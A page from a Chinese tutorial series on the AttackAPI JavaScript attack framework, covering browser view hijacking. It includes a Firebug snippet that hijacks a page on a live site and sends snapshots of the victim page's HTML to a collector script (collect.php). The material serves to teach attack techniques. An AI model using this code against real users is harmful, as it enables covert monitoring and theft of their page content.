开发学院网络安全安全技术 精通JavaScript攻击框架:AttackAPI(下) 阅读

精通JavaScript攻击框架:AttackAPI(下)

 2009-02-13 13:55:12 来源:WEB开发网   
核心提示: 因为,我们所看到的内容跟地址栏中的URL毫不相干,精通JavaScript攻击框架:AttackAPI(下)(7),这里的hijackView函数大部分时候都能得手,另一方面,请再等一会儿,并重试,这种技术可以是成功施加到Kiosk模式的终端机,由于Kiosk 浏览器没有提供地址栏

因为,我们所看到的内容跟地址栏中的URL毫不相干。这里的hijackView函数大部分时候都能得手。另一方面,这种技术可以是成功施加到Kiosk模式的终端机。由于Kiosk 浏览器没有提供地址栏,因此一旦攻击者找到注入并执行JavaScript的方法,他们就可以获得一个几乎永久性的控制。

由于浏览器具有同源策略限制,因此虽然可以劫持视图,但是却不能读取或者操纵它的内容,除非满足同源策略的要求。在这方面,劫持了来自myspace.com 的用户的攻击者无法读取这些用户在google.com上的内容。记住,攻击者仍然能控制用户的浏览器视图。当被劫持的用户位于攻击启动域相同的域内时,攻击者可以发动大量的攻击来监视用户的活动,从而收集很敏感的信息。下面看看如何通过AttackAPI达到此目的。

对于下面的演示,我们需要对一次真实的攻击进行模拟,因此,我们将要使用AttackAPI的bookmarklet加载库函数到一个真实的页面上。您可以从www.gnucitizen.org/projects/load-AttackAPI-bookmarklet来复制AttackAPI的bookmarklet。 将该书签放在你的书签工具栏中,并来到cn.msn.com。一旦到达这里,打开Firebug控制台。现在按下该书签。AttackAPI将在几秒钟内载入。为了检测是否已经加载好,可以输入:

dir($A);

如果没有出现$A对象,请再等一会儿,并重试。清空Firebug控制台,然后输入下列命令:

$A.hijackView({
onload: function () {
try {
var hijackedDocument = $A.getDocument(this);
var query = {};
query['snapshot_' + new Date().getTime()] =
hijackedDocument.body.innerHTML;
$A.transport({url: 'http://127.0.0.1:8888/collect.php', query:
query});
} catch(e) {}
}
});

上一页  2 3 4 5 6 7 8 9  下一页

Tags:精通 JavaScript 攻击

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接